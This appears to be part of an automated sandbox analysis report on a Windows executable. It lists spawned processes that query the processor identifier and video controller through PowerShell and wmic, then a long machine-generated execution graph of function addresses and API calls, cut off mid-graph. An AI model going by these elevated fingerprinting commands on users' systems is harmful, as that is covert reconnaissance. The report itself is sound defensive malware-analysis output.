                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:123
                                                                                                                                                                                                                            Start time:09:32:58
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:124
                                                                                                                                                                                                                            Start time:09:32:58
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:129
                                                                                                                                                                                                                            Start time:09:32:59
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:9.4%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:19.9%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:69
                                                                                                                                                                                                                              execution_graph 17163 7ff6dc70cc3c 17184 7ff6dc70ce0c 17163->17184 17166 7ff6dc70cd88 17338 7ff6dc70d12c IsProcessorFeaturePresent 17166->17338 17167 7ff6dc70cc58 __scrt_acquire_startup_lock 17169 7ff6dc70cd92 17167->17169 17176 7ff6dc70cc76 __scrt_release_startup_lock 17167->17176 17170 7ff6dc70d12c 7 API calls 17169->17170 17172 7ff6dc70cd9d __CxxCallCatchBlock 17170->17172 17171 7ff6dc70cc9b 17173 7ff6dc70cd21 17190 7ff6dc70d274 17173->17190 17175 7ff6dc70cd26 17193 7ff6dc701000 17175->17193 17176->17171 17176->17173 17327 7ff6dc719b2c 17176->17327 17181 7ff6dc70cd49 17181->17172 17334 7ff6dc70cf90 17181->17334 17185 7ff6dc70ce14 17184->17185 17186 7ff6dc70ce20 __scrt_dllmain_crt_thread_attach 17185->17186 17187 7ff6dc70cc50 17186->17187 17188 7ff6dc70ce2d 17186->17188 17187->17166 17187->17167 17188->17187 17345 7ff6dc70d888 17188->17345 17191 7ff6dc72a4d0 __scrt_get_show_window_mode 17190->17191 17192 7ff6dc70d28b GetStartupInfoW 17191->17192 17192->17175 17194 7ff6dc701009 17193->17194 17372 7ff6dc715484 17194->17372 17196 7ff6dc7037fb 17379 7ff6dc7036b0 17196->17379 17201 7ff6dc70c550 _log10_special 8 API calls 17202 7ff6dc703ca7 17201->17202 17332 7ff6dc70d2b8 GetModuleHandleW 17202->17332 17203 7ff6dc70383c 17546 7ff6dc701c80 17203->17546 17204 7ff6dc70391b 17555 7ff6dc7045c0 17204->17555 17208 7ff6dc70385b 17451 7ff6dc708830 17208->17451 17209 7ff6dc70396a 17578 7ff6dc702710 17209->17578 17213 7ff6dc70388e 17220 7ff6dc7038bb __std_exception_destroy 17213->17220 17550 7ff6dc7089a0 17213->17550 17214 7ff6dc70395d 17215 7ff6dc703984 17214->17215 17216 7ff6dc703962 17214->17216 17218 7ff6dc701c80 49 API calls 17215->17218 17574 7ff6dc71004c 17216->17574 17221 7ff6dc7039a3 17218->17221 17222 7ff6dc708830 14 API calls 17220->17222 17230 7ff6dc7038de __std_exception_destroy 17220->17230 17226 7ff6dc701950 115 API calls 17221->17226 17222->17230 17223 7ff6dc708940 40 API calls 17224 7ff6dc703a0b 17223->17224 17225 7ff6dc7089a0 40 API calls 17224->17225 17227 7ff6dc703a17 17225->17227 17228 7ff6dc7039ce 17226->17228 17231 7ff6dc7089a0 40 API calls 17227->17231 17228->17208 17229 7ff6dc7039de 17228->17229 17232 7ff6dc702710 54 API calls 17229->17232 17230->17223 17235 7ff6dc70390e __std_exception_destroy 17230->17235 17233 7ff6dc703a23 17231->17233 17275 7ff6dc703808 __std_exception_destroy 17232->17275 17234 7ff6dc7089a0 40 API calls 17233->17234 17234->17235 17236 7ff6dc708830 14 API calls 17235->17236 17237 7ff6dc703a3b 17236->17237 17238 7ff6dc703b2f 17237->17238 17239 7ff6dc703a60 __std_exception_destroy 17237->17239 17240 7ff6dc702710 54 API calls 17238->17240 17249 7ff6dc703aab 17239->17249 17464 7ff6dc708940 17239->17464 17240->17275 17242 7ff6dc708830 14 API calls 17243 7ff6dc703bf4 __std_exception_destroy 17242->17243 17244 7ff6dc703d41 17243->17244 17245 7ff6dc703c46 17243->17245 17589 7ff6dc7044e0 17244->17589 17246 7ff6dc703cd4 17245->17246 17247 7ff6dc703c50 17245->17247 17251 7ff6dc708830 14 API calls 17246->17251 17471 7ff6dc7090e0 17247->17471 17249->17242 17254 7ff6dc703ce0 17251->17254 17252 7ff6dc703d4f 17255 7ff6dc703d65 17252->17255 17256 7ff6dc703d71 17252->17256 17257 7ff6dc703c61 17254->17257 17261 7ff6dc703ced 17254->17261 17592 7ff6dc704630 17255->17592 17259 7ff6dc701c80 49 API calls 17256->17259 17263 7ff6dc702710 54 API calls 17257->17263 17271 7ff6dc703cc8 __std_exception_destroy 17259->17271 17264 7ff6dc701c80 49 API calls 17261->17264 17263->17275 17267 7ff6dc703d0b 17264->17267 17265 7ff6dc703dbc 17521 7ff6dc709390 17265->17521 17270 7ff6dc703d12 17267->17270 17267->17271 17268 7ff6dc703da7 LoadLibraryExW 17268->17265 17269 7ff6dc703dcf SetDllDirectoryW 17274 7ff6dc703e02 17269->17274 17317 7ff6dc703e52 17269->17317 17273 7ff6dc702710 54 API calls 17270->17273 17271->17265 17271->17268 17273->17275 17277 7ff6dc708830 14 API calls 17274->17277 17275->17201 17276 7ff6dc704000 17279 7ff6dc70402d 17276->17279 17280 7ff6dc70400a PostMessageW GetMessageW 17276->17280 17283 7ff6dc703e0e __std_exception_destroy 17277->17283 17278 7ff6dc703f13 17526 7ff6dc7033c0 17278->17526 17669 7ff6dc703360 17279->17669 17280->17279 17285 7ff6dc703eea 17283->17285 17289 7ff6dc703e46 17283->17289 17288 7ff6dc708940 40 API calls 17285->17288 17288->17317 17289->17317 17595 7ff6dc706dc0 17289->17595 17317->17276 17317->17278 17328 7ff6dc719b43 17327->17328 17329 7ff6dc719b64 17327->17329 17328->17173 19589 7ff6dc71a3d8 17329->19589 17333 7ff6dc70d2c9 17332->17333 17333->17181 17336 7ff6dc70cfa1 17334->17336 17335 7ff6dc70cd60 17335->17171 17336->17335 17337 7ff6dc70d888 7 API calls 17336->17337 17337->17335 17339 7ff6dc70d152 __CxxCallCatchBlock __scrt_get_show_window_mode 17338->17339 17340 7ff6dc70d171 RtlCaptureContext RtlLookupFunctionEntry 17339->17340 17341 7ff6dc70d1d6 __scrt_get_show_window_mode 17340->17341 17342 7ff6dc70d19a RtlVirtualUnwind 17340->17342 17343 7ff6dc70d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17341->17343 17342->17341 17344 7ff6dc70d256 __CxxCallCatchBlock 17343->17344 17344->17169 17346 7ff6dc70d89a 17345->17346 17347 7ff6dc70d890 17345->17347 17346->17187 17351 7ff6dc70dc24 17347->17351 17352 7ff6dc70d895 17351->17352 17353 7ff6dc70dc33 17351->17353 17355 7ff6dc70dc90 17352->17355 17359 7ff6dc70de60 17353->17359 17356 7ff6dc70dcbb 17355->17356 17357 7ff6dc70dc9e DeleteCriticalSection 17356->17357 17358 7ff6dc70dcbf 17356->17358 17357->17356 17358->17346 17363 7ff6dc70dcc8 17359->17363 17364 7ff6dc70ddb2 TlsFree 17363->17364 17370 7ff6dc70dd0c __vcrt_FlsAlloc 17363->17370 17365 7ff6dc70dd3a LoadLibraryExW 17367 7ff6dc70ddd9 17365->17367 17368 7ff6dc70dd5b GetLastError 17365->17368 17366 7ff6dc70ddf9 GetProcAddress 17366->17364 17367->17366 17369 7ff6dc70ddf0 FreeLibrary 17367->17369 17368->17370 17369->17366 17370->17364 17370->17365 17370->17366 17371 7ff6dc70dd7d LoadLibraryExW 17370->17371 17371->17367 17371->17370 17375 7ff6dc71f480 17372->17375 17373 7ff6dc71f4d3 17374 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17373->17374 17376 7ff6dc71f4fc 17374->17376 17375->17373 17377 7ff6dc71f526 17375->17377 17376->17196 17682 7ff6dc71f358 17377->17682 17690 7ff6dc70c850 17379->17690 17382 7ff6dc703710 17692 7ff6dc709280 FindFirstFileExW 17382->17692 17383 7ff6dc7036eb GetLastError 17697 7ff6dc702c50 17383->17697 17386 7ff6dc703706 17391 7ff6dc70c550 _log10_special 8 API calls 17386->17391 17388 7ff6dc703723 17712 7ff6dc709300 CreateFileW 17388->17712 17389 7ff6dc70377d 17723 7ff6dc709440 17389->17723 17394 7ff6dc7037b5 17391->17394 17393 7ff6dc70378b 17393->17386 17398 7ff6dc702810 49 API calls 17393->17398 17394->17275 17401 7ff6dc701950 17394->17401 17396 7ff6dc703734 17715 7ff6dc702810 17396->17715 17397 7ff6dc70374c __vcrt_FlsAlloc 17397->17389 17398->17386 17402 7ff6dc7045c0 108 API calls 17401->17402 17403 7ff6dc701985 17402->17403 17404 7ff6dc701c43 17403->17404 17405 7ff6dc707f90 83 API calls 17403->17405 17406 7ff6dc70c550 _log10_special 8 API calls 17404->17406 17407 7ff6dc7019cb 17405->17407 17408 7ff6dc701c5e 17406->17408 17450 7ff6dc701a03 17407->17450 18068 7ff6dc7106d4 17407->18068 17408->17203 17408->17204 17410 7ff6dc71004c 74 API calls 17410->17404 17411 7ff6dc7019e5 17412 7ff6dc7019e9 17411->17412 17413 7ff6dc701a08 17411->17413 17414 7ff6dc714f08 _set_fmode 11 API calls 17412->17414 18072 7ff6dc71039c 17413->18072 17416 7ff6dc7019ee 17414->17416 18075 7ff6dc702910 17416->18075 17419 7ff6dc701a45 17424 7ff6dc701a5c 17419->17424 17425 7ff6dc701a7b 17419->17425 17420 7ff6dc701a26 17421 7ff6dc714f08 _set_fmode 11 API calls 17420->17421 17422 7ff6dc701a2b 17421->17422 17423 7ff6dc702910 54 API calls 17422->17423 17423->17450 17426 7ff6dc714f08 _set_fmode 11 API calls 17424->17426 17427 7ff6dc701c80 49 API calls 17425->17427 17428 7ff6dc701a61 17426->17428 17429 7ff6dc701a92 17427->17429 17430 7ff6dc702910 54 API calls 17428->17430 17431 7ff6dc701c80 49 API calls 17429->17431 17430->17450 17432 7ff6dc701add 17431->17432 17433 7ff6dc7106d4 73 API calls 17432->17433 17434 7ff6dc701b01 17433->17434 17435 7ff6dc701b35 17434->17435 17436 7ff6dc701b16 17434->17436 17438 7ff6dc71039c _fread_nolock 53 API calls 17435->17438 17437 7ff6dc714f08 _set_fmode 11 API calls 17436->17437 17439 7ff6dc701b1b 17437->17439 17440 7ff6dc701b4a 17438->17440 17441 7ff6dc702910 54 API calls 17439->17441 17442 7ff6dc701b50 17440->17442 17443 7ff6dc701b6f 17440->17443 17441->17450 17445 7ff6dc714f08 _set_fmode 11 API calls 17442->17445 18090 7ff6dc710110 17443->18090 17447 7ff6dc701b55 17445->17447 17448 7ff6dc702910 54 API calls 17447->17448 17448->17450 17449 7ff6dc702710 54 API calls 17449->17450 17450->17410 17452 7ff6dc70883a 17451->17452 17453 7ff6dc709390 2 API calls 17452->17453 17454 7ff6dc708859 GetEnvironmentVariableW 17453->17454 17455 7ff6dc708876 ExpandEnvironmentStringsW 17454->17455 17456 7ff6dc7088c2 17454->17456 17455->17456 17457 7ff6dc708898 17455->17457 17458 7ff6dc70c550 _log10_special 8 API calls 17456->17458 17459 7ff6dc709440 2 API calls 17457->17459 17460 7ff6dc7088d4 17458->17460 17461 7ff6dc7088aa 17459->17461 17460->17213 17462 7ff6dc70c550 _log10_special 8 API calls 17461->17462 17463 7ff6dc7088ba 17462->17463 17463->17213 17465 7ff6dc709390 2 API calls 17464->17465 17466 7ff6dc70895c 17465->17466 17467 7ff6dc709390 2 API calls 17466->17467 17468 7ff6dc70896c 17467->17468 18305 7ff6dc718238 17468->18305 17470 7ff6dc70897a __std_exception_destroy 17470->17249 17472 7ff6dc7090f5 17471->17472 18323 7ff6dc708570 GetCurrentProcess OpenProcessToken 17472->18323 17475 7ff6dc708570 7 API calls 17476 7ff6dc709121 17475->17476 17477 7ff6dc70913a 17476->17477 17478 7ff6dc709154 17476->17478 17479 7ff6dc7026b0 48 API calls 17477->17479 17480 7ff6dc7026b0 48 API calls 17478->17480 17481 7ff6dc709152 17479->17481 17482 7ff6dc709167 LocalFree LocalFree 17480->17482 17481->17482 17483 7ff6dc709183 17482->17483 17485 7ff6dc70918f 17482->17485 18333 7ff6dc702b50 17483->18333 17486 7ff6dc70c550 _log10_special 8 API calls 17485->17486 17487 7ff6dc703c55 17486->17487 17487->17257 17488 7ff6dc708660 17487->17488 17489 7ff6dc708678 17488->17489 17490 7ff6dc7086fa GetTempPathW GetCurrentProcessId 17489->17490 17491 7ff6dc70869c 17489->17491 18342 7ff6dc7025c0 17490->18342 17493 7ff6dc708830 14 API calls 17491->17493 17494 7ff6dc7086a8 17493->17494 18349 7ff6dc7081d0 17494->18349 17501 7ff6dc708728 __std_exception_destroy 17506 7ff6dc708765 __std_exception_destroy 17501->17506 18346 7ff6dc718b68 17501->18346 17512 7ff6dc709390 2 API calls 17506->17512 17520 7ff6dc7087d4 __std_exception_destroy 17506->17520 17522 7ff6dc7093d6 17521->17522 17523 7ff6dc7093b2 MultiByteToWideChar 17521->17523 17524 7ff6dc7093f3 MultiByteToWideChar 17522->17524 17525 7ff6dc7093ec __std_exception_destroy 17522->17525 17523->17522 17523->17525 17524->17525 17525->17269 17532 7ff6dc7033ce __scrt_get_show_window_mode 17526->17532 17527 7ff6dc7035c7 17528 7ff6dc70c550 _log10_special 8 API calls 17527->17528 17529 7ff6dc703664 17528->17529 17529->17275 17545 7ff6dc7090c0 LocalFree 17529->17545 17531 7ff6dc701c80 49 API calls 17531->17532 17532->17527 17532->17531 17536 7ff6dc7035c9 17532->17536 17538 7ff6dc702a50 54 API calls 17532->17538 17540 7ff6dc7035e2 17532->17540 17543 7ff6dc7035d0 17532->17543 18511 7ff6dc704560 17532->18511 18517 7ff6dc707e20 17532->18517 18529 7ff6dc701600 17532->18529 18577 7ff6dc707120 17532->18577 18581 7ff6dc704190 17532->18581 18625 7ff6dc704450 17532->18625 17534 7ff6dc702710 54 API calls 17534->17527 17539 7ff6dc702710 54 API calls 17536->17539 17538->17532 17539->17527 17540->17534 17544 7ff6dc702710 54 API calls 17543->17544 17544->17527 17547 7ff6dc701ca5 17546->17547 17548 7ff6dc714984 49 API calls 17547->17548 17549 7ff6dc701cc8 17548->17549 17549->17208 17551 7ff6dc709390 2 API calls 17550->17551 17552 7ff6dc7089b4 17551->17552 17553 7ff6dc718238 38 API calls 17552->17553 17554 7ff6dc7089c6 __std_exception_destroy 17553->17554 17554->17220 17556 7ff6dc7045cc 17555->17556 17557 7ff6dc709390 2 API calls 17556->17557 17558 7ff6dc7045f4 17557->17558 17559 7ff6dc709390 2 API calls 17558->17559 17560 7ff6dc704607 17559->17560 18792 7ff6dc715f94 17560->18792 17563 7ff6dc70c550 _log10_special 8 API calls 17564 7ff6dc70392b 17563->17564 17564->17209 17565 7ff6dc707f90 17564->17565 17566 7ff6dc707fb4 17565->17566 17567 7ff6dc7106d4 73 API calls 17566->17567 17572 7ff6dc70808b __std_exception_destroy 17566->17572 17568 7ff6dc707fd0 17567->17568 17568->17572 19183 7ff6dc7178c8 17568->19183 17570 7ff6dc7106d4 73 API calls 17573 7ff6dc707fe5 17570->17573 17571 7ff6dc71039c _fread_nolock 53 API calls 17571->17573 17572->17214 17573->17570 17573->17571 17573->17572 17575 7ff6dc71007c 17574->17575 19198 7ff6dc70fe28 17575->19198 17577 7ff6dc710095 17577->17209 17579 7ff6dc70c850 17578->17579 17580 7ff6dc702734 GetCurrentProcessId 17579->17580 17581 7ff6dc701c80 49 API calls 17580->17581 17582 7ff6dc702787 17581->17582 17583 7ff6dc714984 49 API calls 17582->17583 17584 7ff6dc7027cf 17583->17584 17585 7ff6dc702620 12 API calls 17584->17585 17586 7ff6dc7027f1 17585->17586 17587 7ff6dc70c550 _log10_special 8 API calls 17586->17587 17588 7ff6dc702801 17587->17588 17588->17275 17590 7ff6dc701c80 49 API calls 17589->17590 17591 7ff6dc7044fd 17590->17591 17591->17252 17593 7ff6dc701c80 49 API calls 17592->17593 17594 7ff6dc704660 17593->17594 17594->17271 17594->17594 17596 7ff6dc706dd5 17595->17596 17597 7ff6dc703e64 17596->17597 17598 7ff6dc714f08 _set_fmode 11 API calls 17596->17598 17601 7ff6dc707340 17597->17601 17599 7ff6dc706de2 17598->17599 17600 7ff6dc702910 54 API calls 17599->17600 17600->17597 19209 7ff6dc701470 17601->19209 19315 7ff6dc706360 17669->19315 17689 7ff6dc71546c EnterCriticalSection 17682->17689 17691 7ff6dc7036bc GetModuleFileNameW 17690->17691 17691->17382 17691->17383 17693 7ff6dc7092bf FindClose 17692->17693 17694 7ff6dc7092d2 17692->17694 17693->17694 17695 7ff6dc70c550 _log10_special 8 API calls 17694->17695 17696 7ff6dc70371a 17695->17696 17696->17388 17696->17389 17698 7ff6dc70c850 17697->17698 17699 7ff6dc702c70 GetCurrentProcessId 17698->17699 17728 7ff6dc7026b0 17699->17728 17701 7ff6dc702cb9 17732 7ff6dc714bd8 17701->17732 17704 7ff6dc7026b0 48 API calls 17705 7ff6dc702d34 FormatMessageW 17704->17705 17707 7ff6dc702d7f MessageBoxW 17705->17707 17708 7ff6dc702d6d 17705->17708 17710 7ff6dc70c550 _log10_special 8 API calls 17707->17710 17709 7ff6dc7026b0 48 API calls 17708->17709 17709->17707 17711 7ff6dc702daf 17710->17711 17711->17386 17713 7ff6dc703730 17712->17713 17714 7ff6dc709340 GetFinalPathNameByHandleW CloseHandle 17712->17714 17713->17396 17713->17397 17714->17713 17716 7ff6dc702834 17715->17716 17717 7ff6dc7026b0 48 API calls 17716->17717 17718 7ff6dc702887 17717->17718 17719 7ff6dc714bd8 48 API calls 17718->17719 17720 7ff6dc7028d0 MessageBoxW 17719->17720 17721 7ff6dc70c550 _log10_special 8 API calls 17720->17721 17722 7ff6dc702900 17721->17722 17722->17386 17724 7ff6dc70946a WideCharToMultiByte 17723->17724 17727 7ff6dc709495 17723->17727 17726 7ff6dc7094ab __std_exception_destroy 17724->17726 17724->17727 17725 7ff6dc7094b2 WideCharToMultiByte 17725->17726 17726->17393 17727->17725 17727->17726 17729 7ff6dc7026d5 17728->17729 17730 7ff6dc714bd8 48 API calls 17729->17730 17731 7ff6dc7026f8 17730->17731 17731->17701 17735 7ff6dc714c32 17732->17735 17733 7ff6dc714c57 17734 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17733->17734 17739 7ff6dc714c81 17734->17739 17735->17733 17736 7ff6dc714c93 17735->17736 17750 7ff6dc712f90 17736->17750 17738 7ff6dc714d74 17741 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17738->17741 17740 7ff6dc70c550 _log10_special 8 API calls 17739->17740 17742 7ff6dc702d04 17740->17742 17741->17739 17742->17704 17744 7ff6dc714d49 17747 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17744->17747 17745 7ff6dc714d9a 17745->17738 17746 7ff6dc714da4 17745->17746 17749 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17746->17749 17747->17739 17748 7ff6dc714d40 17748->17738 17748->17744 17749->17739 17751 7ff6dc712fce 17750->17751 17753 7ff6dc712fbe 17750->17753 17752 7ff6dc712fd7 17751->17752 17757 7ff6dc713005 17751->17757 17754 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17752->17754 17756 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17753->17756 17755 7ff6dc712ffd 17754->17755 17755->17738 17755->17744 17755->17745 17755->17748 17756->17755 17757->17753 17757->17755 17761 7ff6dc7139a4 17757->17761 17794 7ff6dc7133f0 17757->17794 17831 7ff6dc712b80 17757->17831 17762 7ff6dc7139e6 17761->17762 17763 7ff6dc713a57 17761->17763 17766 7ff6dc7139ec 17762->17766 17767 7ff6dc713a81 17762->17767 17764 7ff6dc713a5c 17763->17764 17765 7ff6dc713ab0 17763->17765 17768 7ff6dc713a5e 17764->17768 17769 7ff6dc713a91 17764->17769 17773 7ff6dc713ac7 17765->17773 17774 7ff6dc713aba 17765->17774 17779 7ff6dc713abf 17765->17779 17770 7ff6dc713a20 17766->17770 17771 7ff6dc7139f1 17766->17771 17854 7ff6dc711d54 17767->17854 17772 7ff6dc713a00 17768->17772 17781 7ff6dc713a6d 17768->17781 17861 7ff6dc711944 17769->17861 17776 7ff6dc7139f7 17770->17776 17770->17779 17771->17773 17771->17776 17792 7ff6dc713af0 17772->17792 17834 7ff6dc714158 17772->17834 17868 7ff6dc7146ac 17773->17868 17774->17767 17774->17779 17776->17772 17782 7ff6dc713a32 17776->17782 17789 7ff6dc713a1b 17776->17789 17779->17792 17872 7ff6dc712164 17779->17872 17781->17767 17784 7ff6dc713a72 17781->17784 17782->17792 17844 7ff6dc714494 17782->17844 17784->17792 17850 7ff6dc714558 17784->17850 17786 7ff6dc70c550 _log10_special 8 API calls 17788 7ff6dc713dea 17786->17788 17788->17757 17789->17792 17793 7ff6dc713cdc 17789->17793 17879 7ff6dc7147c0 17789->17879 17792->17786 17793->17792 17885 7ff6dc71ea08 17793->17885 17795 7ff6dc7133fe 17794->17795 17796 7ff6dc713414 17794->17796 17798 7ff6dc713454 17795->17798 17799 7ff6dc7139e6 17795->17799 17800 7ff6dc713a57 17795->17800 17797 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17796->17797 17796->17798 17797->17798 17798->17757 17803 7ff6dc7139ec 17799->17803 17804 7ff6dc713a81 17799->17804 17801 7ff6dc713a5c 17800->17801 17802 7ff6dc713ab0 17800->17802 17805 7ff6dc713a5e 17801->17805 17806 7ff6dc713a91 17801->17806 17810 7ff6dc713ac7 17802->17810 17811 7ff6dc713aba 17802->17811 17816 7ff6dc713abf 17802->17816 17807 7ff6dc713a20 17803->17807 17808 7ff6dc7139f1 17803->17808 17812 7ff6dc711d54 38 API calls 17804->17812 17809 7ff6dc713a00 17805->17809 17820 7ff6dc713a6d 17805->17820 17814 7ff6dc711944 38 API calls 17806->17814 17813 7ff6dc7139f7 17807->17813 17807->17816 17808->17810 17808->17813 17815 7ff6dc714158 47 API calls 17809->17815 17830 7ff6dc713af0 17809->17830 17817 7ff6dc7146ac 45 API calls 17810->17817 17811->17804 17811->17816 17828 7ff6dc713a1b 17812->17828 17813->17809 17818 7ff6dc713a32 17813->17818 17813->17828 17814->17828 17815->17828 17819 7ff6dc712164 38 API calls 17816->17819 17816->17830 17817->17828 17821 7ff6dc714494 46 API calls 17818->17821 17818->17830 17819->17828 17820->17804 17822 7ff6dc713a72 17820->17822 17821->17828 17824 7ff6dc714558 37 API calls 17822->17824 17822->17830 17823 7ff6dc70c550 _log10_special 8 API calls 17825 7ff6dc713dea 17823->17825 17824->17828 17825->17757 17826 7ff6dc7147c0 45 API calls 17829 7ff6dc713cdc 17826->17829 17827 7ff6dc71ea08 46 API calls 17827->17829 17828->17826 17828->17829 17828->17830 17829->17827 17829->17830 17830->17823 18051 7ff6dc710fc8 17831->18051 17835 7ff6dc71417e 17834->17835 17897 7ff6dc710b80 17835->17897 17840 7ff6dc7147c0 45 API calls 17841 7ff6dc7142c3 17840->17841 17842 7ff6dc7147c0 45 API calls 17841->17842 17843 7ff6dc714351 17841->17843 17842->17843 17843->17789 17845 7ff6dc7144c9 17844->17845 17846 7ff6dc71450e 17845->17846 17847 7ff6dc7144e7 17845->17847 17848 7ff6dc7147c0 45 API calls 17845->17848 17846->17789 17849 7ff6dc71ea08 46 API calls 17847->17849 17848->17847 17849->17846 17853 7ff6dc714579 17850->17853 17851 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17852 7ff6dc7145aa 17851->17852 17852->17789 17853->17851 17853->17852 17855 7ff6dc711d87 17854->17855 17856 7ff6dc711db6 17855->17856 17858 7ff6dc711e73 17855->17858 17860 7ff6dc711df3 17856->17860 18024 7ff6dc710c28 17856->18024 17859 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17858->17859 17859->17860 17860->17789 17862 7ff6dc711977 17861->17862 17863 7ff6dc7119a6 17862->17863 17865 7ff6dc711a63 17862->17865 17864 7ff6dc710c28 12 API calls 17863->17864 17867 7ff6dc7119e3 17863->17867 17864->17867 17866 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17865->17866 17866->17867 17867->17789 17869 7ff6dc7146ef 17868->17869 17871 7ff6dc7146f3 __crtLCMapStringW 17869->17871 18032 7ff6dc714748 17869->18032 17871->17789 17873 7ff6dc712197 17872->17873 17874 7ff6dc7121c6 17873->17874 17876 7ff6dc712283 17873->17876 17875 7ff6dc710c28 12 API calls 17874->17875 17878 7ff6dc712203 17874->17878 17875->17878 17877 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17876->17877 17877->17878 17878->17789 17880 7ff6dc7147d7 17879->17880 18036 7ff6dc71d9b8 17880->18036 17887 7ff6dc71ea39 17885->17887 17895 7ff6dc71ea47 17885->17895 17886 7ff6dc71ea67 17889 7ff6dc71ea78 17886->17889 17890 7ff6dc71ea9f 17886->17890 17887->17886 17888 7ff6dc7147c0 45 API calls 17887->17888 17887->17895 17888->17886 18044 7ff6dc7200a0 17889->18044 17892 7ff6dc71eac9 17890->17892 17893 7ff6dc71eb2a 17890->17893 17890->17895 17892->17895 17896 7ff6dc71f8a0 _fread_nolock MultiByteToWideChar 17892->17896 17894 7ff6dc71f8a0 _fread_nolock MultiByteToWideChar 17893->17894 17894->17895 17895->17793 17896->17895 17898 7ff6dc710ba6 17897->17898 17899 7ff6dc710bb7 17897->17899 17905 7ff6dc71e570 17898->17905 17899->17898 17900 7ff6dc71d5fc _fread_nolock 12 API calls 17899->17900 17901 7ff6dc710be4 17900->17901 17902 7ff6dc710bf8 17901->17902 17903 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17901->17903 17904 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17902->17904 17903->17902 17904->17898 17906 7ff6dc71e58d 17905->17906 17907 7ff6dc71e5c0 17905->17907 17908 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17906->17908 17907->17906 17910 7ff6dc71e5f2 17907->17910 17909 7ff6dc7142a1 17908->17909 17909->17840 17909->17841 17915 7ff6dc71e705 17910->17915 17922 7ff6dc71e63a 17910->17922 17911 7ff6dc71e7f7 17951 7ff6dc71da5c 17911->17951 17913 7ff6dc71e7bd 17944 7ff6dc71ddf4 17913->17944 17915->17911 17915->17913 17916 7ff6dc71e78c 17915->17916 17917 7ff6dc71e74f 17915->17917 17919 7ff6dc71e745 17915->17919 17937 7ff6dc71e0d4 17916->17937 17927 7ff6dc71e304 17917->17927 17919->17913 17921 7ff6dc71e74a 17919->17921 17921->17916 17921->17917 17922->17909 17923 7ff6dc71a4a4 __std_exception_copy 37 API calls 17922->17923 17924 7ff6dc71e6f2 17923->17924 17924->17909 17925 7ff6dc71a900 _isindst 17 API calls 17924->17925 17926 7ff6dc71e854 17925->17926 17960 7ff6dc7240ac 17927->17960 17931 7ff6dc71e3ac 17932 7ff6dc71e401 17931->17932 17933 7ff6dc71e3cc 17931->17933 17936 7ff6dc71e3b0 17931->17936 18013 7ff6dc71def0 17932->18013 18009 7ff6dc71e1ac 17933->18009 17936->17909 17938 7ff6dc7240ac 38 API calls 17937->17938 17939 7ff6dc71e11e 17938->17939 17940 7ff6dc723af4 37 API calls 17939->17940 17941 7ff6dc71e16e 17940->17941 17942 